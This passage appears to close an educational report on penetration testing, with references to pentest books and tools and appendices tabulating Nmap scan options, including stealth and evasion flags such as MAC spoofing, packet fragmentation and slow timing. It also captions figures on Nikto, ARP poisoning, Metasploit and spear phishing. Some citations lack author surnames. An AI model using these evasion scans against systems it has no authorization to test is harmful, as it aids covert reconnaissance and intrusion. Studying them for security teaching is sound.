Penetration Testing Execution Standard. (2012). PTES Technical Guidelines. Retrieved from Pentest-Standard.
Penetration Testing Execution Standard. (2012). Cracking Passwords. Retrieved from Penetration Testing Execution Standard.
. (2015). OWASP ZAP User Guide. Retrieved from GitHub.
, E. (2018). Why the Best Defense Is a Good Offensive Security Strategy. Retrieved from Security Intelligence.
, C. (2017). Practical Packet Analysis. San Francisco, California, United States: No Starch Press.
Sharma, H. (2017). Kali Linux - An Ethical Hacker's Cookbook. Birmingham, UK: Packt Publishing.
Sivarajan, S., Chaturvedi, S., Shetty, A., Parikh, K., & Youe, R. (2015). Getting Started with Windows Server Security. Birmingham, UK: Packt Publishing.
Sood, A., & Enbody, R. (2014). Targeted Cyber Attacks. Waltham, Massachusetts, United States: Syngress.
Stamparm. (2014). SQLMap Features. Retrieved from GitHub.
, J. (2019). Retrieved from Hashcat: Advanced Password Recovery.
, C. (2019). Nikto. Retrieved from GitHub.
Teixeira, D., Singh, A., & Agarwal, M. (2018). Metasploit Penetration Testing Cookbook (3rd ed.). Birmingham, UK: Packt Publishing.
Velu, V. K. (2017). Mastering Kali Linux for Advanced Penetration Testing. Birmingham, UK: Packt Publishing.
Yerrid, K. (2013). Instant Netcat Starter. Birmingham, UK: Packt Publishing.

Appendix A

Table 1. Example of Basic Nmap Command Options

Option | Example in a command | Description
-A | nmap -A 192.168.1.1 | Enables OS detection, version detection, script scanning, and traceroute
-sV | nmap -sV 192.168.1.1 | Attempts to determine the version of the service running on each port
-sC | nmap -sC 192.168.1.1 | Scans with the default NSE scripts; considered useful for discovery and safe
-f | nmap -f 192.168.1.1 | The requested scan (including ping scans) uses tiny fragmented IP packets, which are harder for packet filters to handle
-v | nmap -v 192.168.1.1 | Increases the verbosity level (use -vv or more for greater effect)
-h | nmap -h | Nmap help screen, which displays many options
-p | nmap -p 80 192.168.1.1 | Specifies which port(s) to scan
(Lyon, 2008)

Table 2. Nmap Stealth Scanning Options

Option example | Description
--spoof-mac Cisco | Spoofs the MAC address shown in packets so that the scanner appears to be a Cisco device
--data-length 24 | Appends 24 random bytes to most packets sent
-T paranoid | Sets the scan timing to its slowest setting
--max-hostgroup | Limits the number of IPs scanned at once
--max-parallelism or --scan-delay | Both limit the number of probes in flight, reducing the packet rate so that the scan blends in with normal traffic
-PN | Stops Nmap from pinging hosts first, which can expose the scan (spelled -Pn in current Nmap releases)
-f | Fragments packets to obscure the intentions of the scan
(Beggs, 2017, pp. 66-72)

Appendix B

Figure 1. Nikto Options 1
Note: This illustrates the options that Nikto offers when performing a scan.

Figure 2. Nikto Options 2
Note: This illustrates the rest of the Nikto options when performing a scan.

Figure 3. ARP Poisoning Before and After
Note: This illustrates how network traffic between two devices changes when an ARP poisoning attack has been performed.

Figure 4. Enum4linux Help Page Output
Note: This illustrates the output of the help page for enum4linux, showing the options available when performing enumeration with enum4linux.

Figure 5. Syntax for Metasploit
Note: This illustrates the syntax for Metasploit Framework command-line usage.

Figure 6. Spear Phishing Model: Targeted Cyber Attack
Note: This figure illustrates the spear phishing attack model used to launch a targeted attack.